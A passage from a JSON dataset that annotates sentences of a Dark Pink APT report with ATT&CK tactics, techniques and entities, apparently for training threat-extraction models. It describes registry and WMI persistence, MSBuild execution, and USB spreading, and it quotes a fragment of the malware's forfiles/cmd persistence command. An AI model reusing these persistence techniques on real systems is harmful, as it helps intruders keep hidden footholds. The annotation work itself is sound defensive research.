Folder" } ], "procedure": "Gain persistence for TelePowerBot in the infected machine registry.", "entities": [ { "text": "gain persistence for TelePowerBot in the registry of the infected machine", "start": 40, "end": 113, "label": "Action" }, { "text": "TelePowerBot", "start": 61, "end": 73, "label": "MalwareTool" }, { "text": "registry", "start": 81, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p8-s65-44deb1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 65, "context_before": "The primary goal of this DLL file is to gain persistence for TelePowerBot in the registry of the infected machine.", "sentence_text": "It is important to note that launching any kind of stealer is optional during initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p8-s66-35672e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 8, "sentence_id": 66, "context_before": "It is important to note that launching any kind of stealer is optional during initial access.", "sentence_text": "Dark Pink send special commands to download and launch a stealer during all phases of attack.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "Send commands to download and launch a stealer.", "entities": [ { "text": "Dark Pink", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "send special commands to download and launch a stealer", "start": 10, "end": 64, "label": "Action" }, { "text": "stealer", "start": 57, "end": 64, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s67-e2715f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 67, "context_before": "Dark Pink can send special commands to download and launch a stealer during all phases of attack.\n8/29", "sentence_text": "It is important to note at this stage that the DLL files are packed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s68-8b83a5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 68, "context_before": "It is important to note at this stage that the DLL files are packed.", "sentence_text": "When the file is launched, it decrypts itself and passes control to an unpacked version of itself.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Upon execution, the file decrypts itself and transfers execution to its unpacked version.", "entities": [ { "text": "the file", "start": 5, "end": 13, "label": "MalwareTool" }, { "text": "is launched", "start": 14, "end": 25, "label": "Action" }, { "text": "decrypts itself", "start": 30, "end": 45, "label": "Action" }, { "text": "passes control to an unpacked version of itself", "start": 50, "end": 97, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s69-653a65", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 69, "context_before": "When the file is launched, it decrypts itself and passes control to an unpacked version of itself.", "sentence_text": "One example of this was: gwgXSznM-Jz92k33A- uRcCCksA-9XAU93r5.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s70-e9e4e9", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 70, "context_before": "One example of this was: gwgXSznM-Jz92k33A- uRcCCksA-9XAU93r5.", "sentence_text": "Upon completion of this step, a command to start TelePowerBot will be added to autorun.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": null, "procedure": "A command is added to autorun to start TelePowerBot automatically.", "entities": [ { "text": "will be added to autorun", "start": 62, "end": 86, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s71-612583", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 71, "context_before": "Upon completion of this step, a command to start TelePowerBot will be added to autorun.", "sentence_text": " TelePowerBot will be launched each time the user logs into their system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ], "procedure": "Launch TelePowerBot each time the user logs into the system.", "entities": [ { "text": "TelePowerBot", "start": 1, "end": 13, "label": "MalwareTool" }, { "text": "will be launched each time the user logs into their system", "start": 14, "end": 72, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s72-7a27a4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 72, "context_before": "This means that TelePowerBot will be launched each time the user logs into their system.", "sentence_text": "This is facilitated by creating a registry key by path HKCU\\Environment\\UserInitMprLogonScript.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": [ { "name": "Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder", "id": "T1547.001" } ], "procedure": "A registry key is created to ensure the malware runs at user logon.", "entities": [ { "text": "creating a registry key", "start": 23, "end": 46, "label": "Action" }, { "text": "HKCU\\Environment\\UserInitMprLogonScript", "start": 55, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s73-5377b8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 73, "context_before": "This is facilitated by creating a registry key by path HKCU\\Environment\\UserInitMprLogonScript.", "sentence_text": "The value of the created key is as follows:\nforfiles.exe /p", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s75-d9433e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 75, "context_before": "%system32% /m", "sentence_text": "notepad.exe /c \"cmd.exe /c whoami >>", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s76-d26922", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 76, "context_before": "notepad.exe /c \"cmd.exe /c whoami >>", "sentence_text": "%appdata%\\a.abcd && %appdata%\\a.abcd && exit\" The above code reveals that the command launches a standard utility, whoami, which shows information about the current user of the machine.", "relevant": "yes", "tactic": [ { "name": "Discovery", "id": "TA0007" } ], "techniques": [ { "name": "System Owner/User Discovery", "id": "T1033" } ], "procedure": "The whoami command is executed to retrieve information about the current user.", "entities": [ { "text": "launches a standard utility", "start": 86, "end": 113, "label": "Action" }, { "text": "whoami", "start": 115, "end": 121, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p9-s77-3c848e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 77, "context_before": "%appdata%\\a.abcd && %appdata%\\a.abcd && exit\" The above code reveals that the command launches a standard utility, whoami, which shows information about the current user of the machine.", "sentence_text": "The output is redirected to a file and execution is finished.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s78-07fc03", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 78, "context_before": "The output is redirected to a file and execution is finished.", "sentence_text": "The key to this answer is the file extension .abcd.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p9-s79-13eb88", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 9, "sentence_id": 79, "context_before": "The key to this answer is the file extension .abcd.", "sentence_text": "In short, the threat actors create a file with this extension name as part of a technique termed Event Triggered 9/29", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "Create a file with a specific extension as part of an event-triggered technique", "entities": [ { "text": "the threat actors", "start": 10, "end": 27, "label": "ThreatActor" }, { "text": "create a file with this extension name", "start": 28, "end": 66, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p10-s80-756ab8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 80, "context_before": "In short, the threat actors create a file with this extension name as part of a technique termed Event Triggered 9/29", "sentence_text": "Execution: Change Default File Association.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s81-33a4b3", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 81, "context_before": "Execution: Change Default File Association.", "sentence_text": "The idea is to add a handler to work with the unrecognized file extension in the registry key tree.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": [ { "name": "Modify Registry", "id": "T1112" } ], "procedure": "A handler is added in the registry to associate a file extension.", "entities": [ { "text": "add a handler", "start": 15, "end": 28, "label": "Action" }, { "text": "registry key tree", "start": 81, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p10-s82-86d62d", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 82, "context_before": "The idea is to add a handler to work with the unrecognized file extension in the registry key tree.", "sentence_text": "This is detailed in the below screenshot.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s83-7a782a", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 83, "context_before": "This is detailed in the below screenshot.", "sentence_text": "The above screenshot details part of a PowerShell command that is triggered when a file is created with the specific extension .abcd.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "Trigger a PowerShell command when a file with the .abcd extension is created.", "entities": [ { "text": "PowerShell command", "start": 39, "end": 57, "label": "MalwareTool" }, { "text": "is triggered when a file is created with the specific extension .abcd", "start": 63, "end": 132, "label": "Action" }, { "text": ".abcd", "start": 127, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p10-s84-c45361", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 84, "context_before": "The above screenshot details part of a PowerShell command that is triggered when a file is created with the specific extension .abcd.", "sentence_text": "The PowerShell commands are stored in base64 view and are highly obfuscated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s85-a977e0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 85, "context_before": "The PowerShell commands are stored in base64 view and are highly obfuscated.", "sentence_text": "Kill Chain 2: Github macros", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s86-764715", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 86, "context_before": "Kill Chain 2: Github macros", "sentence_text": "The second variation of the infection chain is almost identical to the preceding one.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s87-b284af", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 87, "context_before": "The second variation of the infection chain is almost identical to the preceding one.", "sentence_text": "The only thing that differs is the file used in the initial stage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p10-s88-7fd34c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 88, "context_before": "The only thing that differs is the file used in the initial stage.", "sentence_text": "During our analysis, we discovered that the threat actors used commands to automatically download a malicious template document containing TelePowerBot from Github upon opening of the .doc contained in the initial ISO file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Use commands to download a malicious template document containing TelePowerBot when the document is opened", "entities": [ { "text": "the threat actors", "start": 40, "end": 57, "label": "ThreatActor" }, { "text": "TelePowerBot", "start": 139, "end": 151, "label": "MalwareTool" }, { "text": "used commands to automatically download a malicious template document containing TelePowerBot from Github", "start": 58, "end": 163, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p10-s89-e9d7aa", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 10, "sentence_id": 89, "context_before": "During our analysis, we discovered that the threat actors used commands to automatically download a malicious template document containing TelePowerBot from Github upon opening of the .doc contained in the initial ISO file.", "sentence_text": "Macro code written into this template document then works to ensure persistence for the malware.\n10/29", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": null, "procedure": "Macro code is used to ensure persistence of the malware.", "entities": [ { "text": "works to ensure persistence", "start": 52, "end": 79, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p11-s90-ec7a46", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 11, "sentence_id": 90, "context_before": "Macro code written into this template document then works to ensure persistence for the malware.\n10/29", "sentence_text": "In order to evade antivirus defenses on an infected machine during initial access, macro code is written into the template document.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1137", "name": "Office Application Startup" } ], "procedure": "Write macro code into a template document to evade antivirus defenses and support persistence.", "entities": [ { "text": "macro code is written into the template document", "start": 83, "end": 131, "label": "Action" }, { "text": "macro code", "start": 83, "end": 93, "label": "MalwareTool" }, { "text": "template document", "start": 114, "end": 131, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p11-s91-099f51", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 11, "sentence_id": 91, "context_before": "In order to evade antivirus defenses on an infected machine during initial access, macro code is written into the template document.", "sentence_text": "This technique is known as Template Injection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p11-s92-80f888", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 11, "sentence_id": 92, "context_before": "This technique is known as Template Injection.", "sentence_text": "The macro contains several forms with fields, and during execution, the value of these form fields are read and established as a value in registry keys.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1112", "name": "Modify Registry" } ], "procedure": "Read values from document forms and write them into registry keys", "entities": [ { "text": "The macro", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "read and established as a value in registry keys", "start": 103, "end": 151, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p11-s93-3500c1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 11, "sentence_id": 93, "context_before": "The macro contains several forms with fields, and during execution, the value of these form fields are read and established as a value in registry keys.", "sentence_text": "This trick can help the malware avoid detection by antivirus software, as the document itself does not contain any malicious functionalities or code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p11-s94-936a12", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 11, "sentence_id": 94, "context_before": "This trick can help the malware avoid detection by antivirus software, as the document itself does not contain any malicious functionalities or code.", "sentence_text": "The coded documents contain forms with several parameters, and the macros contained in these files can read these values and work to ensure persistence of TelePowerBot on the victim’s machine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p12-s96-bba988", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 12, "sentence_id": 96, "context_before": "11/29", "sentence_text": "The ISO image sent to the victim in a spear-phishing email contained decoy documents, a signed legitimate MS Word file, and a malicious DLL named KamiKakaDropper.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Phishing: Spearphishing Attachment" } ], "procedure": "Send an ISO image in a spear-phishing email containing decoy documents, a legitimate Word file, and a malicious DLL.", "entities": [ { "text": "sent to the victim in a spear-phishing email", "start": 14, "end": 58, "label": "Action" }, { "text": "ISO image", "start": 4, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "malicious DLL named KamiKakaDropper", "start": 126, "end": 161, "label": "MalwareTool" }, { "text": "KamiKakaDropper", "start": 146, "end": 161, "label": "MalwareTool" } ] }, { "uid": "aptnotes-08_aptnotes_report-p12-s97-ea6fca", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 12, "sentence_id": 97, "context_before": "The ISO image sent to the victim in a spear-phishing email contained decoy documents, a signed legitimate MS Word file, and a malicious DLL named KamiKakaDropper.", "sentence_text": "The primary goal of this infection vector is to persist KamiKakaBot on infected machines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p12-s98-2d341e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 12, "sentence_id": 98, "context_before": "The primary goal of this infection vector is to persist KamiKakaBot on infected machines.", "sentence_text": "In this kill chain, an XML file is located at the end of the decoy document in encrypted view.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p12-s99-0057b8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 12, "sentence_id": 99, "context_before": "In this kill chain, an XML file is located at the end of the decoy document in encrypted view.", "sentence_text": "Once the DLL file is launched, the XML file that kicks off the next stage of the kill chain will be decrypted from the decoy document and saved in the infected machine.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Upon execution of the DLL, the embedded XML file is decrypted from the decoy document and written to the infected machine to trigger the next stage.", "entities": [ { "text": "the DLL file", "start": 5, "end": 17, "label": "MalwareTool" }, { "text": "is launched", "start": 18, "end": 29, "label": "Action" }, { "text": "the XML file that kicks off the next stage of the kill chain will be decrypted from the decoy document", "start": 31, "end": 133, "label": "Action" }, { "text": "saved in the infected machine", "start": 138, "end": 167, "label": "Action" }, { "text": "the XML file", "start": 31, "end": 43, "label": "MalwareTool" }, { "text": "the decoy document", "start": 115, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "the infected machine", "start": 147, "end": 167, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p13-s101-20e055", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 13, "sentence_id": 101, "context_before": "12/29", "sentence_text": "The XML file contains an MSBuild project that includes a task to execute .NET code.", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": [ { "name": "Command and Scripting Interpreter: Visual Basic", "id": "T1059.005" } ], "procedure": "The MSBuild project executes .NET code through a defined task.", "entities": [ { "text": "execute .NET code", "start": 65, "end": 82, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p13-s102-059b04", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 13, "sentence_id": 102, "context_before": "The XML file contains an MSBuild project that includes a task to execute .NET code.", "sentence_text": "To find more about how this process works, please refer to the following Microsoft documentation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p13-s103-53126f", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 13, "sentence_id": 103, "context_before": "To find more about how this process works, please refer to the following Microsoft documentation.", "sentence_text": "The logic of the .NET code is simple: launch KamiKakaBot, which itself is located in the XML file (packed and encoded in base64 format).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1127.001", "name": "Trusted Developer Utilities Proxy Execution: MSBuild" } ], "procedure": "Launch KamiKakaBot from an XML file packed and encoded in base64.", "entities": [ { "text": "launch KamiKakaBot", "start": 38, "end": 56, "label": "Action" }, { "text": "KamiKakaBot", "start": 45, "end": 56, "label": "MalwareTool" }, { "text": "XML file", "start": 89, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p13-s104-0c4ebc", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 13, "sentence_id": 104, "context_before": "The logic of the .NET code is simple: launch KamiKakaBot, which itself is located in the XML file (packed and encoded in base64 format).", "sentence_text": "After this file is unpacked, control is passed to KamiKakaBot.\n13/29", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" } ], "techniques": null, "procedure": "Execution control is transferred to KamiKakaBot after unpacking.", "entities": [ { "text": "control is passed", "start": 29, "end": 46, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s105-99e4db", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 105, "context_before": "After this file is unpacked, control is passed to KamiKakaBot.\n13/29", "sentence_text": "The path to the XML file is passed as an argument upon the launch of MSBuild.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s106-2d93d0", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 106, "context_before": "The path to the XML file is passed as an argument upon the launch of MSBuild.", "sentence_text": "The command to run MSBuild is located in the registry key (HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell), which is created during execution of the DLL file.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": [ { "name": "Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder", "id": "T1547.001" } ], "procedure": "A registry key is created to run MSBuild during system logon.", "entities": [ { "text": "is created", "start": 132, "end": 142, "label": "Action" }, { "text": "HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell", "start": 59, "end": 123, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s107-2cfc2e", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 107, "context_before": "The command to run MSBuild is located in the registry key (HKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell), which is created during execution of the DLL file.", "sentence_text": "Once this step is completed, MSBuild will run each time a user logs on to the system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ], "procedure": "Run MSBuild each time a user logs on to the system.", "entities": [ { "text": "MSBuild", "start": 29, "end": 36, "label": "MalwareTool" }, { "text": "will run each time a user logs on to the system", "start": 37, "end": 84, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s108-c6abe1", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 108, "context_before": "Once this step is completed, MSBuild will run each time a user logs on to the system.", "sentence_text": "In addition, the DLL creates a repeatable task to log the victim off from the system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053", "name": "Scheduled Task/Job" } ], "procedure": "Create a repeatable task to log off the victim from the system", "entities": [ { "text": "the DLL", "start": 13, "end": 20, "label": "MalwareTool" }, { "text": "creates a repeatable task to log the victim off from the system", "start": 21, "end": 84, "label": "Action" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s109-8dbb83", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 109, "context_before": "In addition, the DLL creates a repeatable task to log the victim off from the system.", "sentence_text": "Reconnaissance and lateral movement After infecting a computer in the victim organization’s network, the next goal for Dark Pink is to collect as much information as possible about the victim’s network infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s110-edd60b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 110, "context_before": "Reconnaissance and lateral movement After infecting a computer in the victim organization’s network, the next goal for Dark Pink is to collect as much information as possible about the victim’s network infrastructure.", "sentence_text": "information from web browsers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s111-970b26", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 111, "context_before": "information from web browsers.", "sentence_text": "installed software, including antivirus solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s112-529d60", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 112, "context_before": "installed software, including antivirus solutions.", "sentence_text": "information about connected USB devices and network sharing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s113-4075e8", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 113, "context_before": "information about connected USB devices and network sharing.", "sentence_text": "The threat actors also collect a list of network and USB drives that are available for writing, and these are then used for lateral movement.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" }, { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "Collect writable network and USB drives and use them for lateral movement.", "entities": [ { "text": "collect a list of network and USB drives that are available for writing", "start": 23, "end": 94, "label": "Action" }, { "text": "used for lateral movement", "start": 115, "end": 140, "label": "Action" }, { "text": "network and USB drives", "start": 41, "end": 63, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s114-1ed77c", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 114, "context_before": "The threat actors also collect a list of network and USB drives that are available for writing, and these are then used for lateral movement.", "sentence_text": "At this stage, the original files are hidden from the user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s115-0493fb", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 115, "context_before": "At this stage, the original files are hidden from the user.", "sentence_text": "One of the most interesting revelations of our investigation into Dark Pink was how the threat actors carry out lateral movement over USB devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s116-c5991b", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 116, "context_before": "One of the most interesting revelations of our investigation into Dark Pink was how the threat actors carry out lateral movement over USB devices.", "sentence_text": "For this, a new WMI event handler is registered.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription" } ], "procedure": "Register WMI event handler.", "entities": [ { "text": "is registered", "start": 34, "end": 47, "label": "Action" }, { "text": "WMI event handler", "start": 16, "end": 33, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s117-dd9bb5", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 117, "context_before": "For this, a new WMI event handler is registered.", "sentence_text": "From this point onwards, each time a USB flash drive is plugged into an infected machine, a specific action will be executed that sees TeleBotDropper downloaded and stored on the flash drive.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1546", "name": "Event Triggered Execution" }, { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "Download TeleBotDropper and store it on USB flash drive upon trigger.", "entities": [ { "text": "downloaded and stored on the flash drive", "start": 150, "end": 190, "label": "Action" }, { "text": "TeleBotDropper", "start": 135, "end": 149, "label": "MalwareTool" }, { "text": "USB flash drive", "start": 37, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s118-520c21", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 118, "context_before": "From this point onwards, each time a USB flash drive is plugged into an infected machine, a specific action will be executed that sees TeleBotDropper downloaded and stored on the flash drive.", "sentence_text": "Let’s analyze this process a little deeper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s119-f9c890", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 119, "context_before": "Let’s analyze this process a little deeper.", "sentence_text": "Victim plugs USB flash drive into infected device 2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-08_aptnotes_report-p14-s120-9cdaa4", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 120, "context_before": "Victim plugs USB flash drive into infected device 2.", "sentence_text": "The WMI event is triggered, and results in the automatic download of a .ZIP archive from the threat actors’", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Automatically download a ZIP archive from the threat actors when the WMI event is triggered.", "entities": [ { "text": "WMI event", "start": 4, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "is triggered", "start": 14, "end": 26, "label": "Action" }, { "text": "automatic download of a .ZIP archive from the threat actors", "start": 47, "end": 106, "label": "Action" }, { "text": ".ZIP archive", "start": 71, "end": 83, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-08_aptnotes_report-p14-s121-0ccd05", "source": "aptnotes", "doc_id": "08_aptnotes_report", "page_number": 14, "sentence_id": 121, "context_before": "The WMI event is triggered, and results in the automatic download of a .ZIP archive from the threat actors’", "sentence_text": "Github account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, 